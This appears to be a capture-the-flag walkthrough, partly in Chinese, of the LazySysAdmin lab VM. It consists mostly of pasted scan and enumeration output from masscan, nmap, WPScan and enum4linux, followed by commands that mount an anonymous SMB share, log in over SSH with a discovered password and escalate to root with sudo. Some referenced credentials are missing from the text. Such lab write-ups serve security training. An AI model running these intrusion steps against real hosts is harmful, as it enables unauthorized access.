Currently scanning: 192.168.21.0/16 | Screen View: Unique Hosts 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 42 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [10000 ports/host] Discovered open port 3306/tcp on 192.168.0.100 Discovered open port 6667/tcp on 192.168.0.100 Discovered open port 22/tcp on 192.168.0.100 Discovered open port 139/tcp on 192.168.0.100 Discovered open port 80/tcp on 192.168.0.100 Discovered open port 445/tcp on 192.168.0.100
TRACEROUTE HOP RTT ADDRESS 1 0.50 ms LazySysAdmin.lan (192.168.0.100)
NSE: Script Post-scanning. Initiating NSE at 20:55 Completed NSE at 20:55, 0.00s elapsed Initiating NSE at 20:55 Completed NSE at 20:55, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB)
WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________
[+] URL: http://192.168.0.100/wordpress/ [+] Started: Thu Feb 1 01:37:20 2018
[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number [+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/" [+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu) [+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22 [!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register [+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php [!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/ [!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/
[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml
[+] WordPress theme in use: twentyfifteen - v1.8
[+] Name: twentyfifteen - v1.8 | Last updated: 2017-11-16T00:00:00.000Z | Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/ | Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt [!] The version is out of date, the latest version is 1.9 | Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css | Theme Name: Twenty Fifteen | Theme URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,... | Author: the WordPress team | Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection ... [+] No plugins found
============================================= | Nbtstat Information for 192.168.0.100 | ============================================= Looking up status of 192.168.0.100 LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service LAZYSYSADMIN <20> - B <ACTIVE> File Server Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================== | Session Check on 192.168.0.100 | ====================================== [+] Server 192.168.0.100 allows sessions using username '', password ''
============================================ | Getting domain SID for 192.168.0.100 | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on 192.168.0.100 | ======================================= [+] Got OS info for 192.168.0.100 from smbclient: [+] Got OS info for 192.168.0.100 from srvinfo: LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server platform_id : 500 os version : 6.1 server type : 0x809a03 ============================== | Users on 192.168.0.100 | ============================== ========================================== | Share Enumeration on 192.168.0.100 | ========================================== WARNING: The "syslog" option is deprecated Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP [+] Attempting to map shares on 192.168.0.100 //192.168.0.100/print$ Mapping: DENIED, Listing: N/A //192.168.0.100/share$ Mapping: OK, Listing: OK //192.168.0.100/IPC$ [E] Can't understand response: WARNING: The "syslog" option is deprecated NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
===================================================== | Password Policy Information for 192.168.0.100 | =====================================================
[+] Attaching to 192.168.0.100 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] LAZYSYSADMIN [+] Builtin
[+] Password Info for Domain: LAZYSYSADMIN
[+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000
=============================== | Groups on 192.168.0.100 | ===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================== | Users on 192.168.0.100 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8)
============================================== | Getting printer info for 192.168.0.100 | ============================================== No printers returned.
enum4linux complete on Thu Feb 1 00:46:33 2018
windows下获取共享资源
1
net use k: \\192.168.0.100\share$
linux下获取共享资源
1
mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt
发现两个关键的文件deets.txt和wp-config.php
所以我们尝试用上面获取的mysql账号密码去登录phpmyadmin,但是发现没一个表项可以查看。
不过不要紧,上面还有一个密码是12345,而且之前我们登录WordPress页面的时候,页面显示My name is togie.,所以我们可以用账号:togie 密码:12345尝试登录ssh,发现可以成功登录。
1 2 3 4 5 6 7 8
togie@LazySysAdmin:~$ whoami togie togie@LazySysAdmin:~$ id uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) togie@LazySysAdmin:~$ sudo su [sudo] password for togie: root@LazySysAdmin:/home/togie# id uid=0(root) gid=0(root) groups=0(root)
wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz tar zxvf dirb222.tar.gz cd dirb222/ apt-get install libcurl4-gnutls-dev ./configure && make ./dirb #运行即可